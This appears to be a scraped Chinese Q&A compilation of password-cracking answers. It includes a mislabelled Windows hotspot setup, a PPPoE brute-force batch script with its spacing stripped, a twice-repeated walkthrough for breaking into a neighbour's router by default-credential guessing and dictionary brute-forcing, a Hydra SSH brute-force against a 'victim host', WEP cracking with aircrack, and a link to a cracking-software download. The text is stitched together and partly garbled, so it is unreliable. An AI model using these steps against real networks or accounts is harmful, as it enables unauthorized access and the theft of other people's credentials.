① WIN7怎樣破WIFI密碼
1.打開WIN7開始菜單,在左下角的框上輸入CMD,搜索出來的CMD.EXE對著它右鍵,選擇以「管理員身份運行」。
2.
(1)netsh wlan set hostednetwork mode=allow
承載網路模式設置為允許
(2)netsh wlan set hostednetwork ssid=OPEN key=1234567890
設置一個名字為OPEN的無線接入點,接入點密碼為1234567890
(3)netsh wlan start hostednetwork
啟動承載網路
看圖:
註:每次重啟之後都必須重復以上步驟才能開啟這個接入點。為了方便大家,我把以上步驟的設置做成了批處理,請直接下載解壓這個批處理,右鍵選擇以管理員身份運行。(不放心這個腳本的,請右鍵選擇編輯以查看裡面的腳本)
ps.如果提示「無法啟動承載網路,組或資源的狀態不是執行請求操作的正確狀態」 請到「網路和共享中心」(進入方法最簡單的是桌面右下角找到一個類似顯示器的圖標,左鍵點擊就可以見到)
然後選擇「更改適配器設置」
做完這一步之後,把除了有Internet連接的「本地連接」(有些人的可能是寬頻連接)之外的其他都禁用,然後再啟用。
這樣都還是不行的話,就重啟一下電腦重新做。
上面開啟了軟AP。接下來的僅僅是設置了很簡單。
3.重新進入「網路和共享中心」在這個位置把兩個網路都設置為家庭網路
4.設置「無線網路連接」的IP以及DNS
方法:以我的為例 對著右側的「本地連接」左鍵單擊,選擇「詳細信息」,先別關閉,接著單擊「無線網路連接12」,選擇「屬性」,再下拉雙擊選擇「Internet 協議版本 4(TCP/IPv4)」
IP和子網掩碼按照上圖填寫。而DNS就根據剛才「本地連接」的詳細信息裡面的Ip V4 DNS伺服器上的填寫。
5.單擊「本地連接」選擇「屬性」,再選擇「共享」將裡面的兩個連接共享的設置都打上勾,其中「家庭網路連接」那個框上面的字體應該為「OPEN」這個網路的連接名字,比如我的就叫做「無線網路連接 12」
手機不需要任何設置,直接連接OPEN接入輸入密碼即可上網。以下步驟完全就是為了讓milestone更快的連接到「OPEN」這個接入點(因為不需要等虛擬的AP分配IP地址)
6.電腦上的設置就到這里了。接下來是手機設置
在手機待機桌面上按菜單鍵--設置--無線和網路--WLAN 設置--按菜單鍵--高級--使用靜態IP--IP地址(192.168.2.2)--網關(192.168.2.1)--網路掩碼(255.255.255.0)--域名1(你電腦上的第一個DNS)--域名2(你電腦上的第二個DNS)--返回鍵
7.現在,你可以連接名稱為OPEN密碼是1234567890的WIFI接入點了
② 破解路由器登陸密碼的方法步驟
有時我們會給路由器設置比較復雜的登陸密碼,當有天發現登陸密碼忘記了該怎麼辦?這時可以試試破解路由器登陸密碼,具體請看下面我介紹的操作方法!
破解路由器登陸密碼的方法
斷開其它網線介面,只保持路由器通電的情況下,用細螺絲刀或鐵絲插入到路由器“Reset”孔中,並保持8秒鍾以上。

END
③ bat程序對pppoe寬頻連接暴力窮舉破解密碼
@echooff
setname=寬頻連接
delresult.txt>nul2>1
for/f%%iin('typeuser.txt')do(
for/f%%jin('typepassword.txt')do(
RASDIAL%name%%%i%%j
if!errorlevel!==0(echo%%i%%j>>result.txt)
)
)
pause
上面的保存為bat運行即可。user.txt存放你要枚舉的用戶名,password.txt存放枚舉密碼,寬頻連接替換成你的PPPOE名字
result.txt保存測試成功的結果
注意rasdial命令執行一次需要2分鍾,所以測試的速度會非常慢
④ 如何破解無線網密碼求一套完美教程。
第一步:使用T400筆記本針對當前環境下無線網路信號進行掃描,如果周圍有信號而且沒有經過任何加密驗證的話,我們就可以輕松連接到該網路。
2
第二步:當然對於入侵者來說擁有一個不錯的無線網路信號管理工具可以更好的掃描周圍無線信號,從掃描到的信號中獲取對應的波段,選擇一個信號好而又沒有開啟任何加密驗證的無線網路進行連接
三步:連接到對應的無線網路後我們可以通過命令行窗口中的ipconfig命令查看本地系統獲得的IP地址等信息。筆者執行完畢後發現自己的IP地址為192.168.1.102,網關是192.168.1.1。然後我們可以訪問外部網路測試下速度,例如瀏看看是否能夠順利顯示頁面內容
第四步:獲取了網關地址後我們就知道目的網路路由器的管理地址了,然後通過IE瀏覽器訪問http://192.168.1.1不出意外的話將看到路由器登錄界面。從訪問信息處可以了解到該目的無線路由器怎麼裝設備使用的型號是wrt54g,屬於linksys公司發布的。
五步:接下來我們嘗試使用默認的管理用戶名和密碼進行登錄,一般來說可以從網上搜索wrt54g的默認密碼信息,使用默認帳戶admin或root進行訪問,密碼也是admin或root,同時還可以輸入空密碼以及常見數字123,123456,來猜測。如果對方沒有修改預設密碼的話我們就可以順利進入到目的網路路由器中。
第六步:當然筆者所連接的這個路由器默認帳戶信息已經被使用者修改過了,遇到這種情況我們只能夠通過暴力法來破解還原出密碼信息了。首先確定用戶名,一般來說很少有用戶會修改路由器的登錄用戶名,所以我們只需要針對密碼進行猜解即可。就筆者經驗來說用戶名不外乎admin和root兩個,所以我們可以鎖定用戶名信息。
第七步:接下來我們就可以通過專門的路由器密碼暴力破解工具來猜解真實密碼了。筆者使用的是webcracker 4.0,通過他可以針對頁面登錄的帳戶進行猜解。我們只需要啟動該程序然後在選項處設置暴力破解使用的用戶名文件以及用戶名字典文件即可。用戶名文件處選擇帳戶信息,我們可以建立一個文本文件,然後一行一個用戶名然後保存即可,例如
admin
root
第八步:同樣用戶名字典文件就是密碼文件,各個密碼欄位也是一行一個。接下來在URL處輸入要破解路由器的管理地址,例如本例中的192.168.1.1。設置完畢後點上方的「開始」按鈕進行破解。
第九步:當然如果手頭沒有現成的密碼字典的話我們也可以通過專門的字典生成工具來製作相應的文件,例如筆者使用的MONSTER字典 3.0就可以根據實際需要生成不同位數,不同內容的字典文件。啟動該程序後在左邊選擇要生成字典內容的種類,例如筆者猜測目的路由器可能會使用純數字,實際上大部分用戶都會無線網路密碼查看器_無線路由器使用純數字密碼,而且路由器密碼以六位居多。所以我們將數字字典起始位置設置為100000,終止位置是999999,步長為1,這樣就將生成一個從100000開始依次遞加到999999的字典文件。
第十步:點生成按鈕後會在字典目錄下生成一個數字字典,打開該文本文件我們會看到裡面的內容就是從100000開始依次遞加1一直到999999,這個就是我們需要的字典文件。
第十一步:通過該字典我們就可以實現暴力破解的目的了,如果目的路由器使用的密碼是純數字的,那麼在暴力破解過程中會出現FOUND的字樣,在「結果」標簽中將看到發現的用戶名和密碼,例如本例中的用戶名是admin,密碼是1XXX29。
第十二步:使用暴力破解後的用戶信息以及密碼我們就可以順利的進入到目的網路的無線路由器中,從而對裡面的網路設置參數甚至上網帳戶信息進行竊取了。當然本次例子只是告訴大家方法,我們不要用此方法去做壞事。
⑤ 【原創】使用Hydra暴力破解網路協議密碼
Hydra是一款全能的暴力破解工具,功能強大,幾乎支持所有的協議。本次實驗使用Hydra爆破SSH登陸密碼;
參數說明
hydra [[[-l login|-L file] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w time] [-f] [-s PORT] [-S] [-vV] server service [OPT]
-R 繼續從上一次進度接著破解。
-S 採用SSL鏈接。
-s PORT 可通過這個參數指定非默認埠。
-l LOGIN 指定破解的用戶,對特定用戶破解。
-L FILE 指定用戶名字典。
-p PASS 小寫,指定密碼破解,少用,一般是採用密碼字典。
-P FILE 大寫,指定密碼字典。
-e ns 可選選項,n:空密碼試探,s:使用指定用戶和密碼試探。
-C FILE 使用冒號分割格式,例如「登錄名:密碼」來代替-L/-P參數。
-M FILE 指定目標列表文件一行一條。
-o FILE 指定結果輸出文件。
-f 在使用-M參數以後,找到第一對登錄名或者密碼的時候中止破解。
-t TASKS 同時運行的線程數,默認為16。
-w TIME 設置最大超時的時間,單位秒,默認是30s。
-v / -V 顯示詳細過程。
server 目標ip
service 指定服務名,支持的服務和協議:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get}
http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener
postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere
teamspeak sip vmauthd firebird ncp afp等等。
實驗過程
受害主機:192.168.1.103
受害用戶:root
1.我們需要知道受害主機的ssh用戶,例如root。接下來,我們需要准備一個密碼字典,為了節省時間,我們使用了一個簡單的密碼字典,其中包含了[email protected]的正確密碼;
2.在終端中輸入: hydra 192.168.1.103 ssh -l root -P ./Documents/password.txt -V 並回車;
隨後Hydra根據字典的內容進行逐個嘗試,並在全部嘗試完成之後顯示爆破結果。
Safesonic網路安全團隊實驗室2016年08月21日
⑥ 如何破譯無線路由器密碼
下載以下軟體:
1、WinAirCrackPack工具包(WinAirCrackPack工具包是一款無線區域網掃描和密鑰破解工具,主要包括airomp和aircrack等工具。它可以監視無線網路中傳輸的數據,收集數據包,並能計算出WEP/WPA密鑰。我們用它來抓包和暴力破解密碼)
2、Network Stumbler(無線網路信號搜索軟體,可以搜索到隱藏了SSID的AP。用來搜索周圍區域內的無線信號)
下面進入實戰:
1、安裝好無線網卡的驅動並禁用或者取下機器上的其它的無線網卡。
2、安裝Network Stumbler軟體,打開Network Stumbler,等幾分鍾後就可以看見所有的區域中工作中的無線AP,記錄下MAC地址,SSID,信道(chan),是否加密(Encryption)[如果未加密就不需要破解了]。
3、下面再解壓縮下載下來的WinAirCrackPack工具包。可以看到如下文件:
4、運行里頭的airomp.exe,選擇相應的網卡,輸入對應無線網卡前的序號,例如我的是13。
5、輸入o或者a選擇網卡晶元類型,根據你的晶元類型選擇,如果是使用兼容驅動的話選擇a。再選擇搜索頻段,輸入0是代表所有頻段都檢測的意思。接下來會提示你輸入一個保存文件,這樣該工具會把所有sniffer下來的數據包放到這個文件中。隨便建立一個就好了。
6、only write wep ivs是否只檢測WEP加密數據包,我們選擇「Y」即可。
7、如果出現下圖的結果,那麼說明你的網卡驅動不支持此程序,同時會自動打開瀏覽器讓你選擇合適的驅動。
8、在安裝好合適的驅動後會出現下圖:
9、當統計的數據包比較多的時候,就可以自動分析出無線網路對應的SSID號和無線設備的MAC地址以及無線速度,發射頻段和是否加密,採用何種方式加密了。
10、我們成功的實現了通過airomp找到沒有開啟SSID廣播功能的無線網路對應的SSID號,所以說僅僅報著將SSID號隱藏並修改默認名字是不能阻止非法入侵者連接無線網路的。不管你是否開啟SSID廣播,我們都可以通過無線網路的sniffer工具來找出你的真實SSID名稱。然後再對照第二步中獲得的MAC地址和SSID是不是正確。
不過有一點要特別注意,那就是是否能夠破解SSID名稱是建立在airomp搜集到足夠的數據包基礎上的,也就是說也可能你的無線路由器開著,但是沒有任何無線網卡和他通訊,這樣airomp是無法檢測到任何無線數據包並進行分析破解的。
11、再運行WinAirCrackPack工具包裡面的winaircrack.exe程序。
12、在左邊找到general,接下來點GENERAL界面中下方的click here to locate capture file...,讓我們選擇一個捕獲文件。
13、這個文件就是上面所提到的airomp保存下來的數據統計文件,前面已經為其起了一個名字叫softer了,那麼我們到airomp.exe所在文件夾中找到softer.cap文件,這個文件就是捕獲文件。
14、回到general界面,在encryption type處選擇WEP。
15、在左邊點WEP,在WEP設置標簽中先檢測64位密文,key index保持自動AUTO。因為大部分用戶在設置無線路由器WEP加密時都選擇了最簡單的64位密文,他也是破解所需時間最短的。
16、設置完畢點右下角的「aircrack the key...」按鈕,winaircrack會自動根據softer.cap中保存的統計信息進行分析,暴力破解WEP密文。
17、由於採取的是暴力破解方法,所以花費的時間會比較多,大概需要幾個小時甚至更多的時間來破解一個64位的WEP密文。當發現WEP密文後會顯示出內容,如下圖就能夠發現出WEP加密信息為1111122222。
⑦ 手把手教你如何破譯無線路由器密碼
手把手教你如何破譯無線路由器密碼
隨著網路技術的飛速發展,越來越多的路由交換設備開始拋棄使用命令行配置界面而轉向圖形化設置界面。然而這種轉變卻給入侵者帶來了機會,下面就由我來給大家敘述無線路由器密碼破解的教程。
第一步
使用T400筆記本針對當前環境下無線網路信號進行掃描,如果周圍有信號而且沒有經過任何加密驗證的話,就可以輕松連接到該網路。
第二步
當然對於入侵者來說擁有一個不錯的無線網路信號管理工具可以更好的掃描周圍無線信號,從掃描到的信號中獲取對應的波段,選擇一個信號好而又沒有開啟任何加密驗證的無線網路進行連接。
第三步
連接到對應的無線網路後可以通過命令行窗口中的ipconfig命令查看本地系統獲得的IP地址等信息。執行完畢後發現自己的IP地址為192.168.1.102,網關是192.168.1.1。然後可以訪問外部網路測試下速度,例如瀏看看是否能夠順利顯示頁面內容。那麼路由器密碼如何破解?
第四步
獲取了網關地址後就知道目的網路路由器的管理地址了,然後通過IE瀏覽器訪問http://192.168.1.1不出意外的話將看到路由器登錄界面。從訪問信息處可以了解到該目的無線路由器怎麼裝設備使用的型號是wrt54g,屬於linksys公司發布的。
第五步
接下來嘗試使用默認的管理用戶名和密碼進行登錄,一般來說可以從網上搜索wrt54g的默認密碼信息,使用默認帳戶admin或root進行訪問,密碼也是admin或root,同時還可以輸入空密碼以及常見數字123,123456,來猜測。如果對方沒有修改預設密碼的話就可以順利進入到目的網路路由器中。
第六步
所連接的這個路由器默認帳戶信息已經被使用者修改過了,遇到這種情況只能夠通過暴力法來破解還原出密碼信息了。首先確定用戶名,一般來說很少有用戶會修改路由器的登錄用戶名,所以只需要針對密碼進行猜解即可。用戶名不外乎admin和root兩個,所以可以鎖定用戶名信息。
第七步
接下來就可以通過專門的路由器密碼暴力破解工具來猜解真實密碼了。本例使用的是webcracker 4.0,通過他可以針對頁面登錄的帳戶進行猜解。只需要啟動該程序然後在選項處設置暴力破解使用的用戶名文件以及用戶名字典文件即可。用戶名文件處選擇帳戶信息,可以建立一個文本文件,然後一行一個用戶名然後保存即可。
第八步
同樣用戶名字典文件就是密碼文件,各個密碼欄位也是一行一個。接下來在URL處輸入要破解路由器的管理地址,例如本例中的192.168.1.1。設置完畢後點上方的“開始”按鈕進行破解。
第九步
當然如果手頭沒有現成的密碼字典的話也可以通過專門的字典生成工具來製作相應的文件,例如使用的MONSTER字典 3.0就可以根據實際需要生成不同位數,不同內容的字典文件。啟動該程序後在左邊選擇要生成字典內容的種類,例如猜測目的路由器可能會使用純數字,實際上大部分用戶都會無線網路密碼查看器_無線路由器使用純數字密碼,而且路由器密碼以六位居多。所以將數字字典起始位置設置為100000,終止位置是999999,步長為1,這樣就將生成一個從100000開始依次遞加到999999的字典文件。
第十步
點生成按鈕後會在字典目錄下生成一個數字字典,打開該文本文件會看到裡面的內容就是從100000開始依次遞加1一直到999999,這個就是需要的字典文件。
第十一步
通過該字典就可以實現暴力破解的'目的了,如果目的路由器使用的密碼是純數字的,那麼在暴力破解過程中會出現FOUND的字樣,在“結果”標簽中將看到發現的用戶名和密碼。
第十二步
使用暴力破解後的用戶信息以及密碼就可以順利的進入到目的網路的無線路由器中,從而對裡面的網路設置參數甚至上網帳戶信息進行竊取了。
;⑧ 如何破解自家電腦的寬頻密碼
樓主試試這個 這個絕對可以的
多功能密碼破解軟體 4.5最新版 http://ud44.com/tuijian/ogongnenmimapojieruanjian_4_5zuixinban_857.html
軟體功能:
1、用戶可以自定義字元集破解密碼。 2、用戶可以自定義字元串破解密碼。 3、解決了以前版本98\\me下拖拽放大鏡非法操作的BUG。 4、QQ本地破解更加穩定,速度提高數倍。 5、增加截獲windows98登陸密碼功能。 目前本版本可以破解Access97/2000/xp密碼,Word/Excel97/2000/xp、QQ(本地和在線)、SQLSERVER(本地和遠程)、windows98登陸密碼、ZIP/RAR文件密碼,星號密碼察看,可以察看任何顯示為*的密碼內容(網頁除外)。
⑨ 破解網路密碼的方法
1、暴力窮舉
密碼破解技術中最基本的就是暴力破解,也叫密碼窮舉。如果黑客事先知道了賬戶號碼,如郵件帳號、QQ用戶帳號、網上銀行賬號等,而用戶的密碼又設置的十分簡單,比如用簡單的數字組合,黑客使用暴力破解工具很快就可以破解出密碼來。因此用戶要盡量將密碼設置的復雜一些。
2、擊鍵記錄
如果用戶密碼較為復雜,那麼就難以使用暴力窮舉的方式破解,這時黑客往往通過給用戶安裝木馬病毒,設計「擊鍵記錄」程序,記錄和監聽用戶的擊鍵操作,然後通過各種方式將記錄下來的用戶擊鍵內容傳送給黑客,這樣,黑客通過分析用戶擊鍵信息即可破解出用戶的密碼。
3、屏幕記錄
為了防止擊鍵記錄工具,產生了使用滑鼠和圖片錄入密碼的方式,這時黑客可以通過木馬程序將用戶屏幕截屏下來然後記錄滑鼠點擊的位置,通過記錄滑鼠位置對比截屏的圖片,從而破解這類方法的用戶密碼。
4、網路釣魚
「網路釣魚」攻擊利用欺騙性的電子郵件和偽造的網站登陸站點來進行詐騙活動,受騙者往往會泄露自己的敏感信息(如用戶名、口令、帳號、PIN碼或信用卡詳細信息),網路釣魚主要通過發送電子郵件引誘用戶登錄假冒的網上銀行、網上證券網站,騙取用戶帳號密碼實施盜竊。
5、嗅探器(Sniffer)
在區域網上,黑客要想迅速獲得大量的賬號(包括用戶名和密碼),最為有效的手段是使用Sniffer程序。Sniffer,中文翻譯為嗅探器,是一種威脅性極大的被動攻擊工具。使用這種工具,可以監視網路的狀態、數據流動情況以及網路上傳輸的信息。當信息以明文的形式在網路上傳輸時,便可以使用網路監聽的方式竊取網上的傳送的數據包。將網路介面設置在監聽模式,便可以將網上傳輸的源源不斷的信息截獲。任何直接通過HTTP、FTP、POP、SMTP、TELNET協議傳輸的數據包都會被Sniffer程序監聽。
6、系統漏洞
漏洞是在硬體、軟體、協議的具體實現或系統安全策略上存在的缺陷,從而可以使攻擊者能夠在未授權的情況下訪問或破壞系統。許多系統都有這樣那樣的安全漏洞,其中某些是操作系統或應用軟體本身具有的,這些漏洞在補丁未被開發出來之前一般很難防禦黑客的破壞,還有一些漏洞是由於系統管理員配置錯誤引起的。這都會給黑客帶來可乘之機,應及時加以修正。利用系統漏洞的攻擊手段所以能夠存在,根本原因是系統中有安全漏洞的存在以及人類在使用中所犯的錯誤所致。因為很難保證系統的實現和使用中發生錯誤,所以從理論上說無法從根本上解決系統攻擊問題。但是因為系統攻擊依賴於系統中存在的各種漏洞,盡量消除系統中的漏洞並同時嚴格用戶的行為,努力將人為的錯誤風險減少,可以將系統遭受攻擊破壞的可能性減小到最低限度。
7、遠程攻擊
遠程攻擊是指通過網路對連接在網路上的任意一台機器的攻擊活動。一般可根據攻擊者的目的粗略分為遠程入侵與破壞性攻擊兩部分。典型的遠程入侵,是指入侵者通過網路技術,非法獲得對目標系統資源的最高控制權。使用遠程式控制制木馬監視用戶本地電腦的所有操作,用戶的任何鍵盤和滑鼠操作都會被遠程的黑客所截取。破壞性攻擊則是以盜竊系統保密信息、破壞目標系統的數據為目的。
8、不良習慣
有一些公司的員工雖然設置了很長的密碼,但是卻將密碼寫在紙上,還有人使用自己的名字或者自己生日做密碼,還有些人使用常用的單詞做密碼,這些不良的習慣將導緻密碼極易被破解。
9、繞過破解
繞過式密碼破解原理非常簡單,其實就是繞過密碼的認證機制,繞過的方法有很多種,有些取決於系統本身,有些和用戶的習慣有關,例如用戶如果使用了多個系統,黑客可以通過先破解較為簡單的系統的用戶密碼,然後用已經破解的密碼推算出其他系統的用戶密碼,而很多用戶對於所有系統都使用相同的密碼。
10、密碼心理學
不需要工具而破解密碼的騙局稱為社交工程攻擊。很多著名的黑客破解密碼並非用的什麼尖端的技術,而只是用到了密碼心理學,從用戶的心理入手,從細微入手分析用戶的信息,分析用戶的心理,從而更快的破解出密碼。其實,獲得信息還有很多途徑的,密碼心理學如果掌握的好,可以非常快速破解獲得用戶信息。